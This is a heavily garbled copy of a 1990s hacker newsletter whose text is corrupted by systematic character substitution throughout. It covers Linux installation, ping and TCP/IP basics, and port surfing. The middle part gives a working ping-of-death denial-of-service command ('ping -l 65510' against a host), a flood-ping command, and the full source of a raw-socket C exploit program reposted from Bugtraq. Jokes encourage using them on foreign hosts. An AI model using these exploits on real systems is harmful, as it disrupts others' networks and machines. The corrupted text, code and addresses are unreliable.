!sometimes called U?windows$( a gra.hical user interface ) utility .rograms such as the email reader +ine !my fa<orite$ and 3lm #o. ten reasons to install 7inu' on your +/: ,&When 7inu' is outlawed( only outlaws will own 7inu'& -& When installing 7inu'( it is so much fun to run fdisk without backing u. first&

%&#he flames you get from asking @uestions on 7inu' newsgrou.s are of a higher @uality than the flames you get for .osting to alt&se'&bestiality& G&"o matter what fla<or of 7inu' you install( you'll find out tomorrow there was a far more %l,te ersion you should ha<e gotten instead& 5&+eo.le who use Hree BS2 or Solaris will not make fun of you& #hey will offer their sym.athy instead& E&*t the ne't 2ef /on you'll be able to say stu.h like :so then 1 su?ed to his account and gre..ed all his files for 'kissyface'&: 4o.s( gre..ing other .eo.le's files is a no?no( forget 1 e<er suggested it& K&+ort surf in .ri<acy& D&4ne word: e'.loits& 9&1nstalling 7inu' on your office +/ is like being a .ostal worker and bringing an 0>i to work& ,M&But ? ? if you install 7inu' on your office com.uter( you boss won't ha<e a clue what that means& What ty.es of 7inu' work best? 1t de.ends on what you really want& 5edhat 7inu' is famed for being the easiest to install& #he Walnut /reek 7inu' %&M /2?546 set is also really easy to install ?? for 7inu'( that is 6y a..roach has been to get lots of 7inu' <ersions and mi' and match the best from each distribution& 1 like the Walnut /reek <ersion best because with my brand U hardware( its autodetection feature was a life?sa<er& 1"S#*771"G 71"0U is not for the faint of heart Se<eral ti.s for sur<i<ing installation are: ,$ *lthough you in theory can run 7inu' on a -DE with G 6B 5*6 and two flo..y dri<es( it is )much) easier with a GDE or abo<e with D 6B 5*6( a /2?546( and at least -MM 6B free hard disk s.ace& -$ 8now as much as .ossible about what ty.e of mother board( modem( hard disk( /2?546( and <ideo card you ha<e& 1f you ha<e any documentation for these( ha<e them on hand to reference during installation& %$ 1t works better to use hardware that is name?brand and somewhat out?of? date on your com.uter& Because 7inu' is freeware( it doesn't offer de<ice dri<ers for all the latest hardware& *nd if your hardware is like mine ?? lots of Brand U and 3l /hea.o stu.h( you can take a long time e'.erimenting with what dri<ers will work&

G$ Before beginning installation( back u. your hard disk!s$ 1n theory you can install 7inu' without harming your 24SIWindows files& But we are all human( es.ecially if following the ad<ice of .oint K$& 5$ Get more than one 7inu' distribution& #he first time 1 successfully installed 7inu'( 1 finally hit on something that worked by using the boot disk from one distribution with the /2?546 for another& 1n any case( each 7inu' distribution had different utility .rograms( o.erating system emulators( com.ilers and more& *dd them all to your system and you will be set u. to become beyond elite& E$ Buy a book or two or three on 7inu'& 1 didn't like any of them But they are better than nothing& 6ost books on 7inu' come with one or two /2?546s that can be used to install 7inu'& But 1 found that what was in the books did not e'actly coincide with what was on the /2?546s& K$ 1 recommend drinking while installing& 1t may not make debugging go any faster( but at least you won't care how hard it is& "ow 1 can almost guarantee that e<en following all these E .ieces of ad<ice( you will still ha<e .roblems installing 7inu'& 4h( do 1 ha<e K ad<isories u. there? Horget number K& But be of good cheer& Since e<eryone else also suffers mightily when installing and using 7inu'( the 1nternet has an incredible wealth of resources for the 7inu' ?challenged& 1f you are allergic to getting flamed( you can start out with 7inu' su..ort Web sites& #he best 1 ha<e found is htt.:IIsunsite&unc&edu:I.ubI7inu'I& 1t includes the 7inu' Hre@uently *sked Suestions list !H*S$( a<ailable from sunsite&unc&edu:I.ubI7inu'IdocsIH*S& 1n the directory I.ubI7inu'Idocs on sunsite&unc&edu you'll find a number of other documents about 7inu'( including the 7inu' 1"H4?SH33# and 63#*? H*S( #he 7inu' H4W#4 archi<e is on the sunsite&unc&edu Web site at: I.ubI7inu'IdocsIH4W#4& #he directory I.ubI7inu'IdocsI72+ contains the current set of 72+ manuals&

;ou can get ee7inu' 1nstallation and Getting Started'' from sunsite&unc&edu in I.ubI7inu'IdocsI72+Iinstall?guide& #he 53*263 file there describes how you can order a .rinted co.y of the book of the same name !about ,DM .ages$& "ow if you don't mind getting flamed( you may want to .ost @uestions to the ama>ing number of 0senet news grou.s that co<er 7inu'& #hese include: com.&os&linu'&ad<ocacy com.&os&linu'&de<elo.ment&system com.&os&linu'&' com.&os&linu'&de<elo.ment&a..s com.&os&linu'&hardware com.&os&linu'&setu. com.&os&linu'&networking com.&os&linu'&answers linu'&redhat&misc alt&os&linu' alt&uu&com.&os&linu'&@uestions com.&os&linu'&announce 7inu' com.&os&linu'&misc Benefits of 7inu' com.ared 7inu' kernels( de<ice dri<ers 7inu' U Window System ser<ers Writing 7inu' a..lications Hardware com.atibility 7inu' installation "etworking and communications H*Ss( How?#o's( 53*263s( etc& 0se com.&os&linu'&) instead 0senet 0ni<ersity hel.s you *nnouncements im.ortant to 7inu'?s.ecific to.ics

Want your 7inu' free? #obin Hricke has .ointed out that :free co.ies of 7inu' /2?546s are a<ailable the 7inu' Su..ort N /2 Gi<away web site at htt.:IIemile&math&ucsb&edu:DMMMIgi<eaway&html& #his is a .ro=ect where .eo.le donate 7inu' /2's that they don't need any more& #he .ro=ect was seeded by 7inu' Systems 7abs( who donated DMM 7inu' /2s initially +lease remember to donate your 7inu' /2's when you are done with them& 1f you li<e near a com.uter swa. meet( Hry's( 6icrocenter( or other such .lace( look for 7inu' /2's there& #hey are usually under O-M( which is an e'cellent in<estment& 1 .ersonally like the 7inu' 2e<elo.er's 5esource by 1nfomagic( which is now u. to a se<en /2 set( 1 belie<e( which includes all ma=or 7inu' distributions !Slackware( 5edhat( 2ebian( 7inu' for 23/ *l.ha to name a few$.lus mirrors of ts',,&mit&edu and sunsite&unc&eduI.ubIlinu' .lus much more& ;ou should also <isit the W4"235H07 linu' .age at htt.:IIsunsite&unc&eduIlinu'( which has tons of information( as well as the htt.:IIwww&linu'&orgI& ;ou might also want to check out htt.:IIwww&redhat&comI and htt.:IIwww&caldera&comI for more information on commercial <ersions of linu' !which are still freely a<ailable under G"0$&:

How about 7inu' security? ;es( 7inu'( like e<ery o.erating system( is im.erfect& 3minently hackable( if you really want to know& So if you want to find out how to secure your 7inu' system( or if you should come across one of the many 1S+s that use 7inu' and want to go e'.loring !oo.s( forget 1 wrote that$( here's where you can go for info: ft.:IIinfo&cert&orgI.ubIcertFad<isoriesI/*?9G:M,&network&monitoring&attacks ft.:IIinfo&cert&orgI.ubItechFti.sIrootFcom.romise htt.:IIbach&cis&tem.le&eduIlinu'Ilinu'?securityI htt.:IIwww&geek?girl&comIbugtra@I #here is also hel. for 7inu' users on 1nternet 5elay /hat !15/$& Ben !cyberkidJusa&net$ hosts a channel called 97inu'Hel. on the 0ndernet 15/ ser<er& 7ast but not least( if you want to ask 7inu' @uestions on the Ha..y Hacker list( you're welcome& We may be the blind leading the blind( but what the heck FFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& - "umber % 1ntroduction to #/+I1+& #hat means .ackets 2atagrams +ing o<ersi>e .acket denial of ser<ice e'.loit e'.lained& But this hack is a lot less mostly harmless than most& 2on't try this at home&&& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1f you ha<e been on the Ha..y Hacker list for awhile( you'<e been getting some items forwarded from the Bugtra@ list on a new .ing .acket e'.loit& "ow if this has been sounding like gibberish to you( rela'& 1t is really <ery sim.le& 1n fact( it is so sim.le that if you use Windows 95( by the time you finish this article you will know a sim.le( one?line command that you could use to crash many 1nternet hosts and routers& ))))))))))))))))))))))))))))))))))))))))))))))))) ;40 /*" G4 #4 R*17 W*5"1"G: #his time 1'm not going to im.lore the wannabe e<il genius ty.es on this list to be <irtuous and resist the tem.tation

to misuse the information 1'm about to gi<e them& See if 1 care 1f one of those guys gets caught crashing thousands of 1nternet hosts and routers( not only will they go to =ail and get a big fine& We'll all think he or she is a dork& #his e'.loit is a no?brainer( one?line command from Windows 95& ;eah( the o.erating system that is designed for clueless morons& So there is nothing elite about this hack& What is elite is being able to thwart this attack& )))))))))))))))))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))))))))))))))))) "3WB13 "4#3: 1f .ackets( datagrams( and #/+I1+ aren't e'actly your bosom buddies yet( belie<e me( you need to really get in bed with them in order to call yourself a hacker& So hang in here for some technical stuff& When we are done( you'll ha<e the satisfaction of knowing you could wreak ha<oc on the 1nternet( but are too elite to do so& * .acket is a way to send information electronically that kee.s out errors& #he idea is that no transmission technology is .erfect& Ha<e you e<er .layed the game :tele.hone:? ;ou get a do>en or so .eo.le in a circle and the first .erson whis.ers a message to the second& Something like :#he bun is the lowest form of wheat&: #he second .erson whis.ers to the third( :* bum is the lowest form of cheating&: #he third whis.ers( :5um is the lowest form of drinking&: *nd so on& 1t's really fun to find out how far the message can mutate as it goes around the circle& But when( for e'am.le( you get email( you would .refer that it isn't messed u.& So the com.uter that sends the email breaks it u. into little .ieces called datagrams& #hen it wra.s things around each datagram that tell what com.uter it needs to go to( where it came from( and that check whether the datagram might ha<e been garbled& #hese wra..ed u. datagram .ackages are called :.ackets&: "ow if the com.uter sending email to you were to .ackage a really long message into =ust one .acket( chances are .retty high that it will get messed u. while on its way to the other com.uter& Bit bur.s& So when the recei<ing com.uter checks the .acket and finds that it got messed u.( it will throw it away and tell the other com.uter to send it again& 1t could take a long time until this giant .acket gets through intact& But if the message is broken into a lot of little .ieces and wra..ed u. into bunches of .ackets( most of them will be good and the recei<ing com.uter will kee. them& 1t will then tell the sending com.uter to retransmit =ust the

.ackets that messed u.& #hen when all the .ieces finally get there( the recei<ing com.uter .uts them together in the right order and lo and behold( there is the com.lete( error?free email& #/+I1+ stands for #ransmission /ontrol +rotocolI1nternet +rotocol& 1t tells com.uters that are hooked u. to the 1nternet how to .ackage u. messages into .ackets and how to read .ackets these .ackets from other com.uters& +ing uses #/+I1+ to make its .ackets& )))))))))))))))))))))))))))))))))))))))))))))) :+ing: is a command that sends a feeler out from your com.uter to another com.uter to see if it is turned on and hooked to the same network you are on& 4n the 1nternet there are some ten million com.uters that you can .ing& +ing is a command you can gi<e( for e'am.le( from the 0ni'( Windows 95 and Windows "# o.erating systems& 1t is .art of the 1nternet /ontrol 6essage +rotocol !1/6+$( which is used to troubleshoot #/+I1+ networks& What it does is tell a remote com.uter to echo back a .ing& So if you get your .ing back( you know that com.uter is ali<e& Hurthermore( some forms of the .ing command will also tell you how long it takes for a message to go out to that com.uter and come back again& But how does your com.uter know that the .ing it =ust sent out actually echoed back from the targeted com.uter? #he datagram is the answer& #he .ing sent out a datagram& 1f the returning .ing holds this same datagram( you know it was your .ing that =ust echoed back& #he basic format of this command is sim.ly: .ing hostname where :hostname: is the 1nternet address of the com.uter you want to check out& When 1 gi<e this command from Sun 5elease G&, 0ni'( 1 get the answer :hostname is ali<e&: )))))))))))))))))))))))))))))))))))))) #3/H"1/*7 #1+: Because of the destructi<e .owers of .ing( many 1nternet Ser<ice +ro<iders hide the .ing .rogram in their shell accounts where clueless

newbies can't get their hands on it& 1f your shell account says :command not found: when you enter the .ing command( try: IusrIetcI.ing hostname 1f this doesn't work( either try the command `whereis .inga or com.lain to your 1S+'s tech su..ort& #hey may ha<e ddiabled .ing for ordinary users( but if you con<ince tech su..ort you are a good 1nternet citi>en they may let you use it& ))))))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))))))) "3WB13 "4#3: ;ou say you can't find a way to .ing from your on?line ser<ice? #hat may be because you don't ha<e a shell account& But there is one thing you really need in order to hack: * SH377 *//40"# #he reason hackers make fun of .eo.le with *merica 4nline accounts is because that 1S+ doesn't gi<e out shell accounts& #his is because *merica 4nline wants you to be good boys and girls and not hack * :shell account: is an 1nternet account in which your com.uter becomes a terminal of one of your 1S+'s host com.uters& 4nce you are in the :shell: you can gi<e commands to the o.erating system !which is usually 0ni'$ =ust like you were sitting there at the console of one of your 1S+'s hosts& ;ou may already ha<e a shell account but =ust not know how to log on to it& /all tech su..ort with your 1S+ to find out whether you ha<e one( and how to get on it& ))))))))))))))))))))))))))))))))))))))) #here are all sorts of fancy <ariations on the .ing command& *nd( guess what( whene<er there is a command you gi<e o<er the 1nternet that has lots of <ariations( you can =ust about count on there being something hackable in there& 6uhahaha #he flood .ing is a sim.le e'am.le& 1f your o.erating system will let you get away with gi<ing the command: ?V .ing ?f hostname

it sends out a <eritable flood of .ings( as fast as your 1S+'s host machine can make them& #his kee.s the host you'<e targeted so busy echoing back your .ings that it can do little else& 1t also .uts a hea<y load on the network& Hackers with .rimiti<e skill le<els will sometimes get together and use se<eral of their com.uters at once to simultaneously .ing some <ictim's 1nternet host com.uter& #his will generally kee. the <ictim's com.uter too busy to do anything else& 1t may e<en crash& Howe<er( the down side !from the attackers' <iew.oint$ is that it kee.s the attackers' com.uters tied u.( too& )))))))))))))))))))))))))))))))))))))) "3#1S03##3 "4#3: Hlood .inging a com.uter is e'tremely rude& Get caught doing this and you will be lucky if the worst that ha..ens is your on? line ser<ice .ro<ider closes your account& 2o this to a serious hacker and you may need an identity trans.lant& 1f you should start a flood .ing kind of by accident( you can shut it off by holding down the control key and .ressing :c: !control?c$& )))))))))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))))))))) 3C17 G3"10S #1+: +ing yourself 1f you are using some sort of 0ni'( your o.erating system will let you use your com.uter to do =ust about anything to itself that it can do to other com.uters& #he network address that takes you back to your own host com.uter is localhost !or ,-K&M&M&,$& Here's an e'am.le of how 1 use localhost: ^slugV YE5Z ?Vtelnet localhost #rying ,-K&M&M&, &&& /onnected to localhost& 3sca.e character is 'BZ'& Sun4S 0"1U !slug$ login: See( 1'm back to the login se@uence for the com.uter named :slug: all o<er again& "ow 1 .ing myself:

^llamaV YEDZ ?VIusrIetcI.ing localhost localhost is ali<e #his gi<es the same result as if 1 were to command: ^llamaV YE9Z ?VIusrIetcI.ing llama llama&swc.&com is ali<e )))))))))))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))))))))))))) 60H*H*H* #1+: Want to yank someone's chain? #ell him to ft. to ,-K&M&M&, and log in using his or her own user name and .assword for kewl ware> 6y e'?husband 8eith Henson did that to the /hurch of Scientology& #he /4Gs ft.?ed to ,-K&M&M&, and disco<ered all their co.yrighted scri.tures& #hey assumed this was on 8eith's com.uter( not theirs& #hey were )so) sure he had their scri.tures that they took him to court& #he =udge( when he reali>ed they were sim.ly loo.ing back to their own com.uter( literally laughed them out of court& Hor a hilarious transcri.t or audio ta.e of this infamous court session( email hkhensonJcu.&.ortal&com& #hat's 8eith's email address& 6y hat is off to a su.erb hacker ))))))))))))))))))))))))))))))))))))))))))) Howe<er( the o<ersi>e .ing .acket e'.loit you are about to learn will do e<en more damage to some hosts than a gang of flood .ing cons.irators& *nd it will do it without tying u. the attackers' com.uter for any longer than the s.lit second it takes to send out =ust one .ing& #he easiest way to do this hack is to run Windows 95& 2on't ha<e it? ;ou can generally find a 3l /hea.o store that will sell it to you for O99& #o do this( first set u. your Windows 95 system so that you can make a +++ or S71+ connection with the 1nternet using the 2ialu. "etworking .rogram under the 6y /om.uter icon& ;ou may need some hel. from your 1S+ tech su..ort in setting this u.& ;ou must do it this way or this hack won't work& ;our *merica 4nline dialer )definitely) will not work& ))))))))))))))))))))))))))))))))))))

"3WB13 "4#3: 1f your 1nternet connection allows you to run a Web browser that shows .ictures( you can use that dialu. number with your Windows 95 2ialu. "etworking .rogram to get either a +++ or S71+ connection& )))))))))))))))))))))))))))))))))))) "e't( get your connected to the 1nternet& But don't run a browser or anything& 1nstead( once your 2ialu. "etworking .rogram tell you that you ha<e a connection( click on the :Start: button and go to the listing :6S?24S&: 4.en this 24S window& ;ou'll get a .rom.t: /:TwindowsTV "ow let's first do this the good citi>en way& *t this .rom.t you can ty.e in a .lain ordinary :.ing: command: /:TwindowsT.ing hostname where :hostname: is the address of some 1nternet com.uter& Hor e'am.le( you could .ing thales&nmia&com( which is one of my fa<orite com.uters( named after an obscure Greek .hiloso.her& "ow if you ha..ened to know the address of one of Saddam Hussein's com.uters( howe<er( you might want to gi<e the command: c:TwindowsT.ing ?l E55,M saddamFhussein's&com.uter&mil "ow don't really do this to a real com.uter Some( but not all( com.uters will crash and either remain hung or reboot when they get this .ing& 4thers will continue working cheerily along( and then suddenly go under hours later& Why? #hat e'tra added ?l E55,M creates a giant datagram for the .ing .acket& Some com.uters( when asked to send back an identical datagram( get really messed u.& 1f you want all the gory details on this .ing e'.loit( including how to .rotect your com.uters from it( check out htt.:IIwww&so.hist&demon&co&ukI.ing& "ow there are other ways to manufacture a giant .ing datagram besides using Windows 95& Hor e'am.le( if you run certain HreeBS2 or 7inu' <ersions of

0ni' on your +/( you can run this .rogram( which was .osted to the Bugtra@ list& Hrom: Bill Henner ^fennerJfreefall&freebsd&orgV #o: 6ulti.le reci.ients of list B0G#5*S ^B0G#5*SJnets.ace&orgV Sub=ect: +ing e'.loit .rogram Since some .eo.le don't necessarily ha<e Windows '95 bo'es lying around( 1 !Henner$ wrote the following e'.loit .rogram& 1t re@uires a raw socket layer that doesn't mess with the .acket( so BS2 G&%( Sun4S and Solaris are out& 1t works fine on G&GBS2 systems& 1t should work on 7inu' if you com.ile with ?253*77;F5*W& Heel free to do with this what you want& +lease use this tool only to test your own machines( and not to crash others'& ) win95.ing&c ) ) Simulate the e<il win95 :.ing ?l E55,M buggyhost:& ) <ersion ,&M Bill Henner ^fennerJfreebsd&orgV --?4ct?,99E ) ) #his re@uires raw sockets that don't mess with the .acket at all !other ) than adding the checksum$& #hat means that Sun4S( Solaris( and ) BS2G&%?based systems are out& BS2G&G systems !HreeBS2( "etBS2( ) 4.enBS2( BS21$ will work& 7inu' might work( 1 don't ha<e a 7inu' ) system to try it on& ) ) #he attack from the Win95 bo' looks like: ) ,K:-E:,,&M,%E-- cslwin95 V arkroyal: icm.: echo re@uest !frag E,GG:,GDMJMX$ ) ,K:-E:,,&M,5MK9 cslwin95 V arkroyal: !frag E,GG:,GDMJ,GDMX$ ) ,K:-E:,,&M,EE%K cslwin95 V arkroyal: !frag E,GG:,GDMJ-9EMX$ ) ,K:-E:,,&M,K5KK cslwin95 V arkroyal: !frag E,GG:,GDMJGGGMX$ ) ,K:-E:,,&M,DD%% cslwin95 V arkroyal: !frag E,GG:,GDMJ59-MX$ ) ,K:-E:,,&M-M,,- cslwin95 V arkroyal: !frag E,GG:,GDMJKGMMX$ ) ,K:-E:,,&M-,%GE cslwin95 V arkroyal: !frag E,GG:,GDMJDDDMX ) ,K:-E:,,&M--EG, cslwin95 V arkroyal: !frag E,GG:,GDMJ,M%EMX$ ) ,K:-E:,,&M-%DE9 cslwin95 V arkroyal: !frag E,GG:,GDMJ,,DGMX$ ) ,K:-E:,,&M-5,GM cslwin95 V arkroyal: !frag E,GG:,GDMJ,%%-MX$ ) ,K:-E:,,&M-EEMG cslwin95 V arkroyal: !frag E,GG:,GDMJ,GDMMX$ ) ,K:-E:,,&M-KE-D cslwin95 V arkroyal: !frag E,GG:,GDMJ,E-DMX$

) ,K:-E:,,&M-DDK, cslwin95 V arkroyal: !frag E,GG:,GDMJ,KKEMX$ ) ,K:-E:,,&M%M,MM cslwin95 V arkroyal: !frag E,GG:,GDMJ,9-GMX$ ) ,K:-E:,,&M%,%MK cslwin95 V arkroyal: !frag E,GG:,GDMJ-MK-MX$ ) ,K:-E:,,&M%-5G- cslwin95 V arkroyal: !frag E,GG:,GDMJ---MMX$ ) ,K:-E:,,&M%%KKG cslwin95 V arkroyal: !frag E,GG:,GDMJ-%EDMX$ ) ,K:-E:,,&M%5M,D cslwin95 V arkroyal: !frag E,GG:,GDMJ-5,EMX$ ) ,K:-E:,,&M%E5KE cslwin95 V arkroyal: !frag E,GG:,GDMJ-EEGMX$ ) ,K:-E:,,&M%KGEG cslwin95 V arkroyal: !frag E,GG:,GDMJ-D,-MX$ ) ,K:-E:,,&M%DE9E cslwin95 V arkroyal: !frag E,GG:,GDMJ-9EMMX$ ) ,K:-E:,,&M%99EE cslwin95 V arkroyal: !frag E,GG:,GDMJ%,MDMX$ ) ,K:-E:,,&MG,-,D cslwin95 V arkroyal: !frag E,GG:,GDMJ%-5EMX$ ) ,K:-E:,,&MG-5K9 cslwin95 V arkroyal: !frag E,GG:,GDMJ%GMGMX$ ) ,K:-E:,,&MG%DMK cslwin95 V arkroyal: !frag E,GG:,GDMJ%55-MX$ ) ,K:-E:,,&MGE-KE cslwin95 V arkroyal: !frag E,GG:,GDMJ%KMMMX$ ) ,K:-E:,,&MGK-%E cslwin95 V arkroyal: !frag E,GG:,GDMJ%DGDMX$ ) ,K:-E:,,&MGDGKD cslwin95 V arkroyal: !frag E,GG:,GDMJ%99EMX$ ) ,K:-E:,,&MG9E9D cslwin95 V arkroyal: !frag E,GG:,GDMJG,GGMX$ ) ,K:-E:,,&M5M9-9 cslwin95 V arkroyal: !frag E,GG:,GDMJG-9-MX$ ) ,K:-E:,,&M5-,EG cslwin95 V arkroyal: !frag E,GG:,GDMJGGGMMX$ ) ,K:-E:,,&M5%%9D cslwin95 V arkroyal: !frag E,GG:,GDMJG5DDMX$ ) ,K:-E:,,&M5GED5 cslwin95 V arkroyal: !frag E,GG:,GDMJGK%EMX$ ) ,K:-E:,,&M5E%GK cslwin95 V arkroyal: !frag E,GG:,GDMJGDDGMX$ ) ,K:-E:,,&M5K%,% cslwin95 V arkroyal: !frag E,GG:,GDMJ5M%-MX$ ) ,K:-E:,,&M5D%5K cslwin95 V arkroyal: !frag E,GG:,GDMJ5,DMMX$ ) ,K:-E:,,&M595DD cslwin95 V arkroyal: !frag E,GG:,GDMJ5%-DMX$ ) ,K:-E:,,&MEMKDK cslwin95 V arkroyal: !frag E,GG:,GDMJ5GKEMX$ ) ,K:-E:,,&ME-M-% cslwin95 V arkroyal: !frag E,GG:,GDMJ5E-GMX$ ) ,K:-E:,,&ME%-GK cslwin95 V arkroyal: !frag E,GG:,GDMJ5KK-MX$ ) ,K:-E:,,&MEGGK9 cslwin95 V arkroyal: !frag E,GG:,GDMJ59-MMX$ ) ,K:-E:,,&MEE-5- cslwin95 V arkroyal: !frag E,GG:,GDMJEMEDMX$ ) ,K:-E:,,&MEE95K cslwin95 V arkroyal: !frag E,GG:,GDMJE-,EMX$ ) ,K:-E:,,&MED--M cslwin95 V arkroyal: !frag E,GG:,GDMJE%EGMX$ ) ,K:-E:,,&ME9,MK cslwin95 V arkroyal: !frag E,GG:%9DJE5,-M$ ) )I 9include ^stdio&hV 9include ^sysIty.es&hV 9include ^sysIsocket&hV 9include ^netdb&hV

9include ^netinetIin&hV 9include ^netinetIinFsystm&hV 9include ^netinetIi.&hV 9include ^netinetIi.Ficm.&hV I) ) 1f your kernel doesn't muck with raw .ackets( 9define 53*77;F5*W& ) #his is .robably only 7inu'& )I 9ifdef 53*77;F5*W 9define H1U!'$ htons!'$ 9else 9define H1U!'$ !'$ 9endif int main!int argc( char ))arg<$ [ int sA char bufY,5MMZA struct i. )i. W !struct i. )$bufA struct icm. )icm. W !struct icm. )$!i. X ,$A struct hostent )h.A struct sockaddrFin dstA int offsetA int on W ,A b>ero!buf( si>eof buf$A if !!s W socket!*HF1"3#( S4/8F5*W( 1++54#4F1+$$ ^ M$ [ .error!:socket:$A e'it!,$A \ if !setsocko.t!s( 1++54#4F1+( 1+FH251"/7( Non( si>eof!on$$ ^ M$ [ .error!:1+FH251"/7:$A e'it!,$A \ if !argc W -$ [ f.rintf!stderr( :usage: Ps hostnameTn:( arg<YMZ$A e'it!,$A \ if !!h. W gethostbyname!arg<Y,Z$$ WW "077$ [

if !!i.?Vi.Fdst&sFaddr W inetFaddr!arg<Y,Z$$ WW ?,$ [ f.rintf!stderr( :Ps: unknown hostTn:( arg<Y,Z$A \ \ else [ bco.y!h.?VhFaddrFlistYMZ( Ni.?Vi.Fdst&sFaddr( h.?VhFlength$A \ .rintf!:Sending to PsTn:( inetFntoa!i.?Vi.Fdst$$A i.?Vi.F< W GA i.?Vi.Fhl W si>eof )i. VV -A i.?Vi.Ftos W MA i.?Vi.Flen W H1U!si>eof buf$A i.?Vi.Fid W htons!G%-,$A i.?Vi.Foff W H1U!M$A i.?Vi.Fttl W -55A i.?Vi.F. W ,A i.?Vi.Fsum W MA I) kernel fills in )I i.?Vi.Fsrc&sFaddr W MA I) kernel fills in )I dst&sinFaddr W i.?Vi.FdstA dst&sinFfamily W *HF1"3#A icm.?Vicm.Fty.e W 1/6+F3/H4A icm.?Vicm.Fcode W MA icm.?Vicm.Fcksum W htons!]!1/6+F3/H4 ^^ D$$A I) the checksum of all M's is easy to com.ute )I for !offset W MA offset ^ E55%EA offset XW !si>eof buf ? si>eof )i.$$ [ i.?Vi.Foff W H1U!offset VV %$A if !offset ^ E5,-M$ i.?Vi.Foff _W H1U!1+F6H$A else i.?Vi.Flen W H1U!G,D$A I) make total E55%D )I if !sendto!s( buf( si>eof buf( M( !struct sockaddr )$Ndst( si>eof dst$ ^ M$ [ f.rintf!stderr( :offset Pd: :( offset$A .error!:sendto:$A \ if !offset WW M$ [ icm.?Vicm.Fty.e W MA icm.?Vicm.Fcode W MA

icm.?Vicm.Fcksum W MA \ \ \ !3nd of Henner's .ing e'.loit message&$ )))))))))))))))))))))))))))))))))))))))))))) ;40 /*" G4 #4 R*17 "4#3: "ot only is this hack not elite( if you are reading this you don't know enough to kee. from getting busted from doing this .ing hack& 4n the other hand( if you were to do it to an 1nternet host in 1ra@&&& )))))))))))))))))))))))))))))))))))))))))))) 4f course there are many other kewl things you can do with .ing& 1f you ha<e a shell account( you can find out lots of stu.h about .ing by gi<ing the command: man .ing 1n fact( you can get lots of details on any 0ni' command with :man&: Ha<e fun with .ing ?? and be good But remember( 1'm not begging the e<il genius wannabes to be good& See if 1 care when you get busted&&& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& - "umber G 6ore intro to #/+I1+: .ort surfing 2aemons How to get on almost any com.uter without logging in and without breaking the law& 1m.ress your clueless friends and actually disco<er kewl( legal( safe stu.h& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF * few days ago 1 had a lady friend <isiting& Shebs G- and doesnbt own a com.uter& Howe<er( she is taking a class on .ersonal com.uters at a community college& She wanted to know what all this hacking stu.h is about& So 1 decided to introduce her to .ort surfing& *nd while doing it( we stumbled across something kewl&

+ort surfing takes ad<antage of the structure of #/+I1+& #his is the .rotocol !set of rules$ used for com.uters to talk to each other o<er the 1nternet& 4ne of the basic .rinci.les of 0ni' !the most .o.ular o.erating system on the 1nternet$ is to assign a `.orta to e<ery function that one com.uter might command another to .erform& /ommon e'am.les are to send and recei<e email( read 0senet newsgrou.s( telnet( transfer files( and offer Web .ages& )))))))))))))))))))))))) "ewbie note 9,: * com.uter .ort is a .lace where information goes in or out of it& 4n your home com.uter( e'am.les of .orts are your monitor( which sends information out( your keyboard and mouse( which send information in( and your modem( which sends information both out and in& But an 1nternet host com.uter such as callisto&unm&edu has many more .orts than a ty.ical home com.uter& #hese .orts are identified by numbers& "ow these are not all .hysical .orts( like a keyboard or 5S-%- serial .ort !for your modem$& #hey are <irtual !software$ .orts& * `ser<icea is a .rogram running on a `.ort&a When you telnet to a .ort( that .rogram is u. and running( =ust waiting for your in.ut& Ha..y hacking )))))))))))))))))))))))) So if you want to read a Web .age( your browser contacts .ort number DM and tells the com.uter that manages that Web site to let you in& *nd( sure enough( you get into that Web ser<er com.uter without a .assword& 48( big deal& #hatbs .retty standard for the 1nternet& 6any ?? most ?? com.uters on the 1nternet will let you do some things with them without needing a .assword( Howe<er( the essence of hacking is doing things that arenbt ob<ious& #hat donbt =ust =um. out at you from the manuals& 4ne way you can mo<e a ste. u. from the run of the mill com.uter user is to learn how to .ort surf& #he essence of .ort surfing is to .ick out a target com.uter and e'.lore it to see what .orts are o.en and what you can do with them& "ow if you are a la>y hacker you can use canned hacker tools such as Satan or "etcat& #hese are .rograms you can run from 7inu'( HreeBS2 or Solaris !all ty.es of 0ni'$ from your +/& #hey automatically scan your target

com.uters& #hey will tell you what .orts are in use& #hey will also .robe these .orts for .resence of daemons with know security flaws( and tell you what they are& )))))))))))))))))))))))))))))))) "ewbie note 9 -: * daemon is not some sort of grinch or gremlin or EEE guy& 1t is a .rogram that runs in the background on many !but not all$ 0ni' system .orts& 1t waits for you to come along and use it& 1f you find a daemon on a .ort( itbs .robably hackable& Some hacker tools will tell you what the hackable features are of the daemons they detect& )))))))))))))))))))))))))))))))) Howe<er( there are se<eral reasons to surf .orts by hand instead of automatically& ,$ ;ou will learn something& +robing manually you get a gut feel for how the daemon running on that .ort beha<es& 1tbs the difference between watching an '?rated mo<ie and !blush$& -$ ;ou can im.ress your friends& 1f you run a canned hacker tool like Satan your friends will look at you and say( `Big deal& 1 can run .rograms( too&a #hey will immediately catch on to the dirty little secret of the hacker world& 6ost hacking e'.loits are =ust lamer> running .rograms they .icked u. from some BBS or ft. site& But if you enter commands keystroke by keystroke they will see you using your brain& *nd you can hel. them .lay with daemons( too( and gi<e them a giant rush& %$ #he truly elite hackers surf .orts and .lay with daemons by hand because it is the only way to disco<er something new& #here are only a few hundred hackers ?? at most ?? who disco<er new stu.h& #he rest =ust run canned e'.loits o<er and o<er and o<er again& Boring& But 1 am teaching you how to reach the .innacle of hackerdom& "ow let me tell you what my middle aged friend and 1 disco<ered =ust messing around& Hirst( we decided we didnbt want to waste our time messing with some minor little host com.uter& Hey( letbs go for the big time So how do you find a big kahuna com.uter on the 1nternet? We started with a domain which consisted of a 7*" of +/s running 7inu' that 1 ha..ened to already know about( that is used by the "ew 6e'ico 1nternet *ccess 1S+: nmia&com&

